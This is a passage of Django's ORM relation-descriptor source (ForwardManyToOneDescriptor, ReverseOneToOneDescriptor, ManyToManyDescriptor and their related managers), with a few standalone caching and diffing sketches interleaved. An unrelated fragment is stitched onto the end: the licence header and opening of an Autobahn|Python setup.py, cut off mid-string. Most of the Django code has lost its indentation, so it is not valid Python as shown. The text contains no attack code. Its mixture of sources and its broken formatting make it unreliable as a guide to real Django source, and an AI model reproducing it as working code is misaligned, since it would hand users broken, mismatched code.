``ForwardManyToOneDescriptor`` instead.
2. Related instance on the reverse side of a one-to-one relation:
``ReverseOneToOneDescriptor``.
One-to-one relations are asymmetrical, despite the apparent symmetry of the
name, because they're implemented in the database with a foreign key from
one table to another. As a consequence ``ReverseOneToOneDescriptor`` is
slightly different from ``ForwardManyToOneDescriptor``.
3. Related objects manager for related instances on the reverse side of a
many-to-one relation: ``ReverseManyToOneDescriptor``.
Unlike the previous two classes, this one provides access to a collection
of objects. It returns a manager rather than an instance.
4. Related objects manager for related instances on the forward or reverse
sides of a many-to-many relation: ``ManyToManyDescriptor``.
Many-to-many relations are symmetrical. The syntax of Django models
requires declaring them on one side but that's an implementation detail.
They could be declared on the other side without any change in behavior.
Therefore the forward and reverse descriptors can be the same.
If you're looking for ``ForwardManyToManyDescriptor`` or
``ReverseManyToManyDescriptor``, use ``ManyToManyDescriptor`` instead.
"""
from __future__ import unicode_literals
import warnings
from operator import attrgetter
from django.db import connections, router, transaction
from django.db.models import Q, signals
from django.db.models.query import QuerySet
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.functional import cached_property
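# Standalone sketch (assumed names, not Django API) of the caching pattern the
# descriptors below implement: __get__ loads the related object once, stores
# it under a per-instance cache attribute, and returns the cached value on
# later accesses.
class _CachedRelationSketch(object):
    def __init__(self, loader, cache_name):
        self.loader = loader          # callable that fetches the related object
        self.cache_name = cache_name  # attribute name used to memoize it

    def __get__(self, instance, cls=None):
        if instance is None:
            return self
        try:
            return getattr(instance, self.cache_name)
        except AttributeError:
            rel_obj = self.loader(instance)
            setattr(instance, self.cache_name, rel_obj)
            return rel_obj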
class ForwardManyToOneDescriptor(object):
"""
Accessor to the related object on the forward side of a many-to-one or
one-to-one relation.
In the example::
class Child(Model):
parent = ForeignKey(Parent, related_name='children')
``child.parent`` is a ``ForwardManyToOneDescriptor`` instance.
"""
def __init__(self, field_with_rel):
self.field = field_with_rel
self.cache_name = self.field.get_cache_name()
@cached_property
def RelatedObjectDoesNotExist(self):
# The exception can't be created at initialization time since the
# related model might not be resolved yet; `rel.model` might still be
# a string model reference.
return type(
str('RelatedObjectDoesNotExist'),
(self.field.remote_field.model.DoesNotExist, AttributeError),
{}
)
def is_cached(self, instance):
return hasattr(instance, self.cache_name)
def get_queryset(self, **hints):
manager = self.field.remote_field.model._default_manager
# If the related manager indicates that it should be used for
# related fields, respect that.
if not getattr(manager, 'use_for_related_fields', False):
manager = self.field.remote_field.model._base_manager
return manager.db_manager(hints=hints).all()
def get_prefetch_queryset(self, instances, queryset=None):
if queryset is None:
queryset = self.get_queryset()
queryset._add_hints(instance=instances[0])
rel_obj_attr = self.field.get_foreign_related_value
instance_attr = self.field.get_local_related_value
instances_dict = {instance_attr(inst): inst for inst in instances}
related_field = self.field.foreign_related_fields[0]
# FIXME: This will need to be revisited when we introduce support for
# composite fields. In the meantime we take this practical approach to
        # solve a regression on 1.6 when the reverse manager is hidden
# (related_name ends with a '+'). Refs #21410.
# The check for len(...) == 1 is a special case that allows the query
# to be join-less and smaller. Refs #21760.
if self.field.remote_field.is_hidden() or len(self.field.foreign_related_fields) == 1:
query = {'%s__in' % related_field.name: set(instance_attr(inst)[0] for inst in instances)}
else:
query = {'%s__in' % self.field.related_query_name(): instances}
queryset = queryset.filter(**query)
# Since we're going to assign directly in the cache,
# we must manage the reverse relation cache manually.
if not self.field.remote_field.multiple:
rel_obj_cache_name = self.field.remote_field.get_cache_name()
for rel_obj in queryset:
instance = instances_dict[rel_obj_attr(rel_obj)]
setattr(rel_obj, rel_obj_cache_name, instance)
return queryset, rel_obj_attr, instance_attr, True, self.cache_name
def __get__(self, instance, cls=None):
"""
Get the related instance through the forward relation.
With the example above, when getting ``child.parent``:
- ``self`` is the descriptor managing the ``parent`` attribute
- ``instance`` is the ``child`` instance
- ``cls`` is the ``Child`` class (we don't need it)
"""
if instance is None:
return self
# The related instance is loaded from the database and then cached in
# the attribute defined in self.cache_name. It can also be pre-cached
# by the reverse accessor (ReverseOneToOneDescriptor).
try:
rel_obj = getattr(instance, self.cache_name)
except AttributeError:
val = self.field.get_local_related_value(instance)
if None in val:
rel_obj = None
else:
qs = self.get_queryset(instance=instance)
qs = qs.filter(self.field.get_reverse_related_filter(instance))
# Assuming the database enforces foreign keys, this won't fail.
rel_obj = qs.get()
# If this is a one-to-one relation, set the reverse accessor
# cache on the related object to the current instance to avoid
# an extra SQL query if it's accessed later on.
if not self.field.remote_field.multiple:
setattr(rel_obj, self.field.remote_field.get_cache_name(), instance)
setattr(instance, self.cache_name, rel_obj)
if rel_obj is None and not self.field.null:
raise self.RelatedObjectDoesNotExist(
"%s has no %s." % (self.field.model.__name__, self.field.name)
)
else:
return rel_obj
def __set__(self, instance, value):
"""
Set the related instance through the forward relation.
With the example above, when setting ``child.parent = parent``:
- ``self`` is the descriptor managing the ``parent`` attribute
- ``instance`` is the ``child`` instance
        - ``value`` is the ``parent`` instance on the right of the equal sign
"""
# An object must be an instance of the related class.
if value is not None and not isinstance(value, self.field.remote_field.model._meta.concrete_model):
raise ValueError(
'Cannot assign "%r": "%s.%s" must be a "%s" instance.' % (
value,
instance._meta.object_name,
self.field.name,
self.field.remote_field.model._meta.object_name,
)
)
elif value is not None:
if instance._state.db is None:
instance._state.db = router.db_for_write(instance.__class__, instance=value)
elif value._state.db is None:
value._state.db = router.db_for_write(value.__class__, instance=instance)
elif value._state.db is not None and instance._state.db is not None:
if not router.allow_relation(value, instance):
raise ValueError('Cannot assign "%r": the current database router prevents this relation.' % value)
# If we're setting the value of a OneToOneField to None, we need to clear
# out the cache on any old related object. Otherwise, deleting the
# previously-related object will also cause this object to be deleted,
# which is wrong.
if value is None:
# Look up the previously-related object, which may still be available
# since we've not yet cleared out the related field.
# Use the cache directly, instead of the accessor; if we haven't
# populated the cache, then we don't care - we're only accessing
# the object to invalidate the accessor cache, so there's no
# need to populate the cache just to expire it again.
related = getattr(instance, self.cache_name, None)
# If we've got an old related object, we need to clear out its
# cache. This cache also might not exist if the related object
# hasn't been accessed yet.
if related is not None:
setattr(related, self.field.remote_field.get_cache_name(), None)
for lh_field, rh_field in self.field.related_fields:
setattr(instance, lh_field.attname, None)
# Set the values of the related field.
else:
for lh_field, rh_field in self.field.related_fields:
setattr(instance, lh_field.attname, getattr(value, rh_field.attname))
# Set the related instance cache used by __get__ to avoid a SQL query
# when accessing the attribute we just set.
setattr(instance, self.cache_name, value)
# If this is a one-to-one relation, set the reverse accessor cache on
# the related object to the current instance to avoid an extra SQL
# query if it's accessed later on.
if value is not None and not self.field.remote_field.multiple:
setattr(value, self.field.remote_field.get_cache_name(), instance)
class ReverseOneToOneDescriptor(object):
"""
Accessor to the related object on the reverse side of a one-to-one
relation.
In the example::
class Restaurant(Model):
place = OneToOneField(Place, related_name='restaurant')
``place.restaurant`` is a ``ReverseOneToOneDescriptor`` instance.
"""
def __init__(self, related):
self.related = related
self.cache_name = related.get_cache_name()
@cached_property
def RelatedObjectDoesNotExist(self):
# The exception isn't created at initialization time for the sake of
# consistency with `ForwardManyToOneDescriptor`.
return type(
str('RelatedObjectDoesNotExist'),
(self.related.related_model.DoesNotExist, AttributeError),
{}
)
def is_cached(self, instance):
return hasattr(instance, self.cache_name)
def get_queryset(self, **hints):
manager = self.related.related_model._default_manager
# If the related manager indicates that it should be used for
# related fields, respect that.
if not getattr(manager, 'use_for_related_fields', False):
manager = self.related.related_model._base_manager
return manager.db_manager(hints=hints).all()
def get_prefetch_queryset(self, instances, queryset=None):
if queryset is None:
queryset = self.get_queryset()
queryset._add_hints(instance=instances[0])
rel_obj_attr = attrgetter(self.related.field.attname)
def instance_attr(obj):
return obj._get_pk_val()
instances_dict = {instance_attr(inst): inst for inst in instances}
query = {'%s__in' % self.related.field.name: instances}
queryset = queryset.filter(**query)
# Since we're going to assign directly in the cache,
# we must manage the reverse relation cache manually.
rel_obj_cache_name = self.related.field.get_cache_name()
for rel_obj in queryset:
instance = instances_dict[rel_obj_attr(rel_obj)]
setattr(rel_obj, rel_obj_cache_name, instance)
return queryset, rel_obj_attr, instance_attr, True, self.cache_name
def __get__(self, instance, cls=None):
"""
Get the related instance through the reverse relation.
With the example above, when getting ``place.restaurant``:
- ``self`` is the descriptor managing the ``restaurant`` attribute
- ``instance`` is the ``place`` instance
        - ``cls`` is the ``Place`` class (we don't need it)
Keep in mind that ``Restaurant`` holds the foreign key to ``Place``.
"""
if instance is None:
return self
# The related instance is loaded from the database and then cached in
# the attribute defined in self.cache_name. It can also be pre-cached
# by the forward accessor (ForwardManyToOneDescriptor).
try:
rel_obj = getattr(instance, self.cache_name)
except AttributeError:
related_pk = instance._get_pk_val()
if related_pk is None:
rel_obj = None
else:
filter_args = self.related.field.get_forward_related_filter(instance)
try:
rel_obj = self.get_queryset(instance=instance).get(**filter_args)
except self.related.related_model.DoesNotExist:
rel_obj = None
else:
# Set the forward accessor cache on the related object to
# the current instance to avoid an extra SQL query if it's
# accessed later on.
setattr(rel_obj, self.related.field.get_cache_name(), instance)
setattr(instance, self.cache_name, rel_obj)
if rel_obj is None:
raise self.RelatedObjectDoesNotExist(
"%s has no %s." % (
instance.__class__.__name__,
self.related.get_accessor_name()
)
)
else:
return rel_obj
def __set__(self, instance, value):
"""
Set the related instance through the reverse relation.
With the example above, when setting ``place.restaurant = restaurant``:
- ``self`` is the descriptor managing the ``restaurant`` attribute
- ``instance`` is the ``place`` instance
        - ``value`` is the ``restaurant`` instance on the right of the equal sign
Keep in mind that ``Restaurant`` holds the foreign key to ``Place``.
"""
# The similarity of the code below to the code in
# ForwardManyToOneDescriptor is annoying, but there's a bunch
# of small differences that would make a common base class convoluted.
if value is None:
# Update the cached related instance (if any) & clear the cache.
try:
rel_obj = getattr(instance, self.cache_name)
except AttributeError:
pass
else:
delattr(instance, self.cache_name)
setattr(rel_obj, self.related.field.name, None)
elif not isinstance(value, self.related.related_model):
# An object must be an instance of the related class.
raise ValueError(
'Cannot assign "%r": "%s.%s" must be a "%s" instance.' % (
value,
instance._meta.object_name,
self.related.get_accessor_name(),
self.related.related_model._meta.object_name,
)
)
else:
if instance._state.db is None:
instance._state.db = router.db_for_write(instance.__class__, instance=value)
elif value._state.db is None:
value._state.db = router.db_for_write(value.__class__, instance=instance)
elif value._state.db is not None and instance._state.db is not None:
if not router.allow_relation(value, instance):
raise ValueError('Cannot assign "%r": the current database router prevents this relation.' % value)
related_pk = tuple(getattr(instance, field.attname) for field in self.related.field.foreign_related_fields)
# Set the value of the related field to the value of the related object's related field
for index, field in enumerate(self.related.field.local_related_fields):
setattr(value, field.attname, related_pk[index])
# Set the related instance cache used by __get__ to avoid a SQL query
# when accessing the attribute we just set.
setattr(instance, self.cache_name, value)
# Set the forward accessor cache on the related object to the current
# instance to avoid an extra SQL query if it's accessed later on.
setattr(value, self.related.field.get_cache_name(), instance)
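# Tiny standalone sketch of the mutual cache priming the one-to-one
# descriptors above perform: once either side resolves the relation, both
# objects point at each other, so the opposite lookup needs no extra query.
# The attribute names here are illustrative, not real Django cache names.
class _Obj(object):
    pass


def _prime_both_sides(instance, rel_obj, forward_cache_name, reverse_cache_name):
    setattr(instance, forward_cache_name, rel_obj)
    setattr(rel_obj, reverse_cache_name, instance)


_a, _b = _Obj(), _Obj()
_prime_both_sides(_a, _b, '_forward_cache', '_reverse_cache')
assert _a._forward_cache is _b and _b._reverse_cache is _a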
class ReverseManyToOneDescriptor(object):
"""
Accessor to the related objects manager on the reverse side of a
many-to-one relation.
In the example::
class Child(Model):
parent = ForeignKey(Parent, related_name='children')
``parent.children`` is a ``ReverseManyToOneDescriptor`` instance.
    Most of the implementation is delegated to a dynamically defined manager
    class built by ``create_reverse_many_to_one_manager()`` defined below.
"""
def __init__(self, rel):
self.rel = rel
self.field = rel.field
@cached_property
def related_manager_cls(self):
return create_reverse_many_to_one_manager(
self.rel.related_model._default_manager.__class__,
self.rel,
)
def __get__(self, instance, cls=None):
"""
Get the related objects through the reverse relation.
With the example above, when getting ``parent.children``:
- ``self`` is the descriptor managing the ``children`` attribute
- ``instance`` is the ``parent`` instance
        - ``cls`` is the ``Parent`` class (we don't need it)
"""
if instance is None:
return self
return self.related_manager_cls(instance)
def __set__(self, instance, value):
"""
Set the related objects through the reverse relation.
With the example above, when setting ``parent.children = children``:
- ``self`` is the descriptor managing the ``children`` attribute
- ``instance`` is the ``parent`` instance
        - ``value`` is the ``children`` sequence on the right of the equal sign
"""
warnings.warn(
'Direct assignment to the reverse side of a related set is '
'deprecated due to the implicit save() that happens. Use %s.set() '
'instead.' % self.rel.get_accessor_name(), RemovedInDjango20Warning, stacklevel=2,
)
manager = self.__get__(instance)
manager.set(value)
def create_reverse_many_to_one_manager(superclass, rel):
"""
Create a manager for the reverse side of a many-to-one relation.
This manager subclasses another manager, generally the default manager of
the related model, and adds behaviors specific to many-to-one relations.
"""
class RelatedManager(superclass):
def __init__(self, instance):
super(RelatedManager, self).__init__()
self.instance = instance
self.model = rel.related_model
self.field = rel.field
self.core_filters = {self.field.name: instance}
def __call__(self, **kwargs):
# We use **kwargs rather than a kwarg argument to enforce the
# `manager='manager_name'` syntax.
manager = getattr(self.model, kwargs.pop('manager'))
manager_class = create_reverse_many_to_one_manager(manager.__class__, rel)
return manager_class(self.instance)
do_not_call_in_templates = True
def get_queryset(self):
try:
return self.instance._prefetched_objects_cache[self.field.related_query_name()]
except (AttributeError, KeyError):
db = self._db or router.db_for_read(self.model, instance=self.instance)
empty_strings_as_null = connections[db].features.interprets_empty_strings_as_nulls
qs = super(RelatedManager, self).get_queryset()
qs._add_hints(instance=self.instance)
if self._db:
qs = qs.using(self._db)
qs = qs.filter(**self.core_filters)
for field in self.field.foreign_related_fields:
val = getattr(self.instance, field.attname)
if val is None or (val == '' and empty_strings_as_null):
return qs.none()
qs._known_related_objects = {self.field: {self.instance.pk: self.instance}}
return qs
def get_prefetch_queryset(self, instances, queryset=None):
if queryset is None:
queryset = super(RelatedManager, self).get_queryset()
queryset._add_hints(instance=instances[0])
queryset = queryset.using(queryset._db or self._db)
rel_obj_attr = self.field.get_local_related_value
instance_attr = self.field.get_foreign_related_value
instances_dict = {instance_attr(inst): inst for inst in instances}
query = {'%s__in' % self.field.name: instances}
queryset = queryset.filter(**query)
# Since we just bypassed this class' get_queryset(), we must manage
# the reverse relation manually.
for rel_obj in queryset:
instance = instances_dict[rel_obj_attr(rel_obj)]
setattr(rel_obj, self.field.name, instance)
cache_name = self.field.related_query_name()
return queryset, rel_obj_attr, instance_attr, False, cache_name
def add(self, *objs, **kwargs):
bulk = kwargs.pop('bulk', True)
objs = list(objs)
db = router.db_for_write(self.model, instance=self.instance)
def check_and_update_obj(obj):
if not isinstance(obj, self.model):
raise TypeError("'%s' instance expected, got %r" % (
self.model._meta.object_name, obj,
))
setattr(obj, self.field.name, self.instance)
if bulk:
pks = []
for obj in objs:
check_and_update_obj(obj)
if obj._state.adding or obj._state.db != db:
raise ValueError(
"%r instance isn't saved. Use bulk=False or save "
"the object first." % obj
)
pks.append(obj.pk)
self.model._base_manager.using(db).filter(pk__in=pks).update(**{
self.field.name: self.instance,
})
else:
with transaction.atomic(using=db, savepoint=False):
for obj in objs:
check_and_update_obj(obj)
obj.save()
add.alters_data = True
def create(self, **kwargs):
kwargs[self.field.name] = self.instance
db = router.db_for_write(self.model, instance=self.instance)
return super(RelatedManager, self.db_manager(db)).create(**kwargs)
create.alters_data = True
def get_or_create(self, **kwargs):
kwargs[self.field.name] = self.instance
db = router.db_for_write(self.model, instance=self.instance)
return super(RelatedManager, self.db_manager(db)).get_or_create(**kwargs)
get_or_create.alters_data = True
def update_or_create(self, **kwargs):
kwargs[self.field.name] = self.instance
db = router.db_for_write(self.model, instance=self.instance)
return super(RelatedManager, self.db_manager(db)).update_or_create(**kwargs)
update_or_create.alters_data = True
# remove() and clear() are only provided if the ForeignKey can have a value of null.
if rel.field.null:
def remove(self, *objs, **kwargs):
if not objs:
return
bulk = kwargs.pop('bulk', True)
val = self.field.get_foreign_related_value(self.instance)
old_ids = set()
for obj in objs:
# Is obj actually part of this descriptor set?
if self.field.get_local_related_value(obj) == val:
old_ids.add(obj.pk)
else:
raise self.field.remote_field.model.DoesNotExist(
"%r is not related to %r." % (obj, self.instance)
)
self._clear(self.filter(pk__in=old_ids), bulk)
remove.alters_data = True
def clear(self, **kwargs):
bulk = kwargs.pop('bulk', True)
self._clear(self, bulk)
clear.alters_data = True
def _clear(self, queryset, bulk):
db = router.db_for_write(self.model, instance=self.instance)
queryset = queryset.using(db)
if bulk:
# `QuerySet.update()` is intrinsically atomic.
queryset.update(**{self.field.name: None})
else:
with transaction.atomic(using=db, savepoint=False):
for obj in queryset:
setattr(obj, self.field.name, None)
obj.save(update_fields=[self.field.name])
_clear.alters_data = True
def set(self, objs, **kwargs):
# Force evaluation of `objs` in case it's a queryset whose value
# could be affected by `manager.clear()`. Refs #19816.
objs = tuple(objs)
bulk = kwargs.pop('bulk', True)
clear = kwargs.pop('clear', False)
if self.field.null:
db = router.db_for_write(self.model, instance=self.instance)
with transaction.atomic(using=db, savepoint=False):
if clear:
self.clear()
self.add(*objs, bulk=bulk)
else:
old_objs = set(self.using(db).all())
new_objs = []
for obj in objs:
if obj in old_objs:
old_objs.remove(obj)
else:
new_objs.append(obj)
self.remove(*old_objs, bulk=bulk)
self.add(*new_objs, bulk=bulk)
else:
self.add(*objs, bulk=bulk)
set.alters_data = True
return RelatedManager
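# Small, self-contained sketch of the diffing strategy RelatedManager.set()
# uses above when the foreign key is nullable: objects that are already
# related stay untouched, objects no longer requested are removed, and only
# genuinely new ones are added. The helper name is an illustration, not
# Django API.
def _diff_for_set(old_objs, new_objs):
    remaining = set(old_objs)
    to_add = []
    for obj in new_objs:
        if obj in remaining:
            remaining.discard(obj)  # still wanted: neither removed nor re-added
        else:
            to_add.append(obj)
    return remaining, to_add  # (to_remove, to_add)


# Previously related {1, 2, 3}, requested [2, 3, 4] -> remove {1}, add [4].
assert _diff_for_set({1, 2, 3}, [2, 3, 4]) == ({1}, [4])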
class ManyToManyDescriptor(ReverseManyToOneDescriptor):
"""
Accessor to the related objects manager on the forward and reverse sides of
a many-to-many relation.
In the example::
class Pizza(Model):
toppings = ManyToManyField(Topping, related_name='pizzas')
``pizza.toppings`` and ``topping.pizzas`` are ``ManyToManyDescriptor``
instances.
Most of the implementation is delegated to a dynamically defined manager
class built by ``create_forward_many_to_many_manager()`` defined below.
"""
def __init__(self, rel, reverse=False):
super(ManyToManyDescriptor, self).__init__(rel)
self.reverse = reverse
@property
def through(self):
# through is provided so that you have easy access to the through
# model (Book.authors.through) for inlines, etc. This is done as
# a property to ensure that the fully resolved value is returned.
return self.rel.through
@cached_property
def related_manager_cls(self):
model = self.rel.related_model if self.reverse else self.rel.model
return create_forward_many_to_many_manager(
model._default_manager.__class__,
self.rel,
reverse=self.reverse,
)
def create_forward_many_to_many_manager(superclass, rel, reverse):
"""
    Create a manager for either side of a many-to-many relation.
This manager subclasses another manager, generally the default manager of
the related model, and adds behaviors specific to many-to-many relations.
"""
class ManyRelatedManager(superclass):
def __init__(self, instance=None):
super(ManyRelatedManager, self).__init__()
self.instance = instance
if not reverse:
self.model = rel.model
self.query_field_name = rel.field.related_query_name()
self.prefetch_cache_name = rel.field.name
self.source_field_name = rel.field.m2m_field_name()
self.target_field_name = rel.field.m2m_reverse_field_name()
self.symmetrical = rel.symmetrical
else:
self.model = rel.related_model
self.query_field_name = rel.field.name
self.prefetch_cache_name = rel.field.related_query_name()
self.source_field_name = rel.field.m2m_reverse_field_name()
self.target_field_name = rel.field.m2m_field_name()
self.symmetrical = False
self.through = rel.through
self.reverse = reverse
self.source_field = self.through._meta.get_field(self.source_field_name)
self.target_field = self.through._meta.get_field(self.target_field_name)
self.core_filters = {}
for lh_field, rh_field in self.source_field.related_fields:
core_filter_key = '%s__%s' % (self.query_field_name, rh_field.name)
self.core_filters[core_filter_key] = getattr(instance, rh_field.attname)
self.related_val = self.source_field.get_foreign_related_value(instance)
if None in self.related_val:
raise ValueError('"%r" needs to have a value for field "%s" before '
'this many-to-many relationship can be used.' %
(instance, self.source_field_name))
            # Even if this relation is not to the primary key, we still
            # require a pk value. The intent is that the instance has already
            # been saved to the database, although having a pk value isn't a
            # guarantee of that.
if instance.pk is None:
raise ValueError("%r instance needs to have a primary key value before "
"a many-to-many relationship can be used." %
instance.__class__.__name__)
def __call__(self, **kwargs):
# We use **kwargs rather than a kwarg argument to enforce the
# `manager='manager_name'` syntax.
manager = getattr(self.model, kwargs.pop('manager'))
manager_class = create_forward_many_to_many_manager(manager.__class__, rel, reverse)
return manager_class(instance=self.instance)
do_not_call_in_templates = True
def _build_remove_filters(self, removed_vals):
filters = Q(**{self.source_field_name: self.related_val})
# No need to add a subquery condition if removed_vals is a QuerySet without
# filters.
removed_vals_filters = (not isinstance(removed_vals, QuerySet) or
removed_vals._has_filters())
if removed_vals_filters:
filters &= Q(**{'%s__in' % self.target_field_name: removed_vals})
if self.symmetrical:
symmetrical_filters = Q(**{self.target_field_name: self.related_val})
if removed_vals_filters:
symmetrical_filters &= Q(
**{'%s__in' % self.source_field_name: removed_vals})
filters |= symmetrical_filters
return filters
def get_queryset(self):
try:
return self.instance._prefetched_objects_cache[self.prefetch_cache_name]
except (AttributeError, KeyError):
qs = super(ManyRelatedManager, self).get_queryset()
qs._add_hints(instance=self.instance)
if self._db:
qs = qs.using(self._db)
return qs._next_is_sticky().filter(**self.core_filters)
def get_prefetch_queryset(self, instances, queryset=None):
if queryset is None:
queryset = super(ManyRelatedManager, self).get_queryset()
queryset._add_hints(instance=instances[0])
queryset = queryset.using(queryset._db or self._db)
query = {'%s__in' % self.query_field_name: instances}
queryset = queryset._next_is_sticky().filter(**query)
# M2M: need to annotate the query in order to get the primary model
# that the secondary model was actually related to. We know that
# there will already be a join on the join table, so we can just add
# the select.
# For non-autocreated 'through' models, can't assume we are
# dealing with PK values.
fk = self.through._meta.get_field(self.source_field_name)
join_table = self.through._meta.db_table
connection = connections[queryset.db]
qn = connection.ops.quote_name
queryset = queryset.extra(select={
'_prefetch_related_val_%s' % f.attname:
'%s.%s' % (qn(join_table), qn(f.column)) for f in fk.local_related_fields})
return (
queryset,
lambda result: tuple(
getattr(result, '_prefetch_related_val_%s' % f.attname)
for f in fk.local_related_fields
),
lambda inst: tuple(
f.get_db_prep_value(getattr(inst, f.attname), connection)
for f in fk.foreign_related_fields
),
False,
self.prefetch_cache_name,
)
def add(self, *objs):
if not rel.through._meta.auto_created:
opts = self.through._meta
raise AttributeError(
"Cannot use add() on a ManyToManyField which specifies an "
"intermediary model. Use %s.%s's Manager instead." %
(opts.app_label, opts.object_name)
)
db = router.db_for_write(self.through, instance=self.instance)
with transaction.atomic(using=db, savepoint=False):
self._add_items(self.source_field_name, self.target_field_name, *objs)
# If this is a symmetrical m2m relation to self, add the mirror entry in the m2m table
if self.symmetrical:
self._add_items(self.target_field_name, self.source_field_name, *objs)
add.alters_data = True
def remove(self, *objs):
if not rel.through._meta.auto_created:
opts = self.through._meta
raise AttributeError(
"Cannot use remove() on a ManyToManyField which specifies "
"an intermediary model. Use %s.%s's Manager instead." %
(opts.app_label, opts.object_name)
)
self._remove_items(self.source_field_name, self.target_field_name, *objs)
remove.alters_data = True
def clear(self):
db = router.db_for_write(self.through, instance=self.instance)
with transaction.atomic(using=db, savepoint=False):
signals.m2m_changed.send(sender=self.through, action="pre_clear",
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=None, using=db)
filters = self._build_remove_filters(super(ManyRelatedManager, self).get_queryset().using(db))
self.through._default_manager.using(db).filter(filters).delete()
signals.m2m_changed.send(sender=self.through, action="post_clear",
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=None, using=db)
clear.alters_data = True
def set(self, objs, **kwargs):
if not rel.through._meta.auto_created:
opts = self.through._meta
raise AttributeError(
"Cannot set values on a ManyToManyField which specifies an "
"intermediary model. Use %s.%s's Manager instead." %
(opts.app_label, opts.object_name)
)
# Force evaluation of `objs` in case it's a queryset whose value
# could be affected by `manager.clear()`. Refs #19816.
objs = tuple(objs)
clear = kwargs.pop('clear', False)
db = router.db_for_write(self.through, instance=self.instance)
with transaction.atomic(using=db, savepoint=False):
if clear:
self.clear()
self.add(*objs)
else:
old_ids = set(self.using(db).values_list(self.target_field.target_field.attname, flat=True))
new_objs = []
for obj in objs:
fk_val = (self.target_field.get_foreign_related_value(obj)[0]
if isinstance(obj, self.model) else obj)
if fk_val in old_ids:
old_ids.remove(fk_val)
else:
new_objs.append(obj)
self.remove(*old_ids)
self.add(*new_objs)
set.alters_data = True
def create(self, **kwargs):
# This check needs to be done here, since we can't later remove this
# from the method lookup table, as we do with add and remove.
if not self.through._meta.auto_created:
opts = self.through._meta
raise AttributeError(
"Cannot use create() on a ManyToManyField which specifies "
"an intermediary model. Use %s.%s's Manager instead." %
(opts.app_label, opts.object_name)
)
db = router.db_for_write(self.instance.__class__, instance=self.instance)
new_obj = super(ManyRelatedManager, self.db_manager(db)).create(**kwargs)
self.add(new_obj)
return new_obj
create.alters_data = True
def get_or_create(self, **kwargs):
db = router.db_for_write(self.instance.__class__, instance=self.instance)
obj, created = super(ManyRelatedManager, self.db_manager(db)).get_or_create(**kwargs)
# We only need to add() if created because if we got an object back
# from get() then the relationship already exists.
if created:
self.add(obj)
return obj, created
get_or_create.alters_data = True
def update_or_create(self, **kwargs):
db = router.db_for_write(self.instance.__class__, instance=self.instance)
obj, created = super(ManyRelatedManager, self.db_manager(db)).update_or_create(**kwargs)
# We only need to add() if created because if we got an object back
# from get() then the relationship already exists.
if created:
self.add(obj)
return obj, created
update_or_create.alters_data = True
def _add_items(self, source_field_name, target_field_name, *objs):
# source_field_name: the PK fieldname in join table for the source object
# target_field_name: the PK fieldname in join table for the target object
# *objs - objects to add. Either object instances, or primary keys of object instances.
# If there aren't any objects, there is nothing to do.
from django.db.models import Model
if objs:
new_ids = set()
for obj in objs:
if isinstance(obj, self.model):
if not router.allow_relation(obj, self.instance):
raise ValueError(
'Cannot add "%r": instance is on database "%s", value is on database "%s"' %
(obj, self.instance._state.db, obj._state.db)
)
fk_val = self.through._meta.get_field(
target_field_name).get_foreign_related_value(obj)[0]
if fk_val is None:
raise ValueError(
'Cannot add "%r": the value for field "%s" is None' %
(obj, target_field_name)
)
new_ids.add(fk_val)
elif isinstance(obj, Model):
raise TypeError(
"'%s' instance expected, got %r" %
(self.model._meta.object_name, obj)
)
else:
new_ids.add(obj)
db = router.db_for_write(self.through, instance=self.instance)
vals = (self.through._default_manager.using(db)
.values_list(target_field_name, flat=True)
.filter(**{
source_field_name: self.related_val[0],
'%s__in' % target_field_name: new_ids,
}))
new_ids = new_ids - set(vals)
with transaction.atomic(using=db, savepoint=False):
if self.reverse or source_field_name == self.source_field_name:
# Don't send the signal when we are inserting the
# duplicate data row for symmetrical reverse entries.
signals.m2m_changed.send(sender=self.through, action='pre_add',
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=new_ids, using=db)
# Add the ones that aren't there already
self.through._default_manager.using(db).bulk_create([
self.through(**{
'%s_id' % source_field_name: self.related_val[0],
'%s_id' % target_field_name: obj_id,
})
for obj_id in new_ids
])
if self.reverse or source_field_name == self.source_field_name:
# Don't send the signal when we are inserting the
# duplicate data row for symmetrical reverse entries.
signals.m2m_changed.send(sender=self.through, action='post_add',
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=new_ids, using=db)
def _remove_items(self, source_field_name, target_field_name, *objs):
# source_field_name: the PK colname in join table for the source object
# target_field_name: the PK colname in join table for the target object
# *objs - objects to remove
if not objs:
return
# Check that all the objects are of the right type
old_ids = set()
for obj in objs:
if isinstance(obj, self.model):
fk_val = self.target_field.get_foreign_related_value(obj)[0]
old_ids.add(fk_val)
else:
old_ids.add(obj)
db = router.db_for_write(self.through, instance=self.instance)
with transaction.atomic(using=db, savepoint=False):
# Send a signal to the other end if need be.
signals.m2m_changed.send(sender=self.through, action="pre_remove",
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=old_ids, using=db)
target_model_qs = super(ManyRelatedManager, self).get_queryset()
if target_model_qs._has_filters():
old_vals = target_model_qs.using(db).filter(**{
'%s__in' % self.target_field.target_field.attname: old_ids})
else:
old_vals = old_ids
filters = self._build_remove_filters(old_vals)
self.through._default_manager.using(db).filter(filters).delete()
signals.m2m_changed.send(sender=self.through, action="post_remove",
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=old_ids, using=db)
return ManyRelatedManager
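# Illustrative sketch of the dedup step in _add_items() above: target ids
# already present in the through table for this source row are filtered out
# before the bulk insert, so adding the same object twice is a no-op. The
# helper name is assumed for illustration.
def _ids_to_insert(requested_ids, existing_ids):
    return set(requested_ids) - set(existing_ids)


assert _ids_to_insert([1, 2, 3], [2]) == {1, 3}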
|
|
###############################################################################
##
## Copyright (C) 2011-2014 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
from __future__ import absolute_import
from distutils import log
try:
from ez_setup import use_setuptools
use_setuptools()
except Exception as e:
log.warn("ez_setup failed: {0}".format(e))
finally:
from setuptools import setup
import platform
CPY = platform.python_implementation() == 'CPython'
import sys
PY3 = sys.version_info >= (3,)
PY33 = sys.version_info >= (3,3) and sys.version_info < (3,4)
LONGSDESC = """
Autobahn|Python is a network library implementing
* The WebSocket Protocol
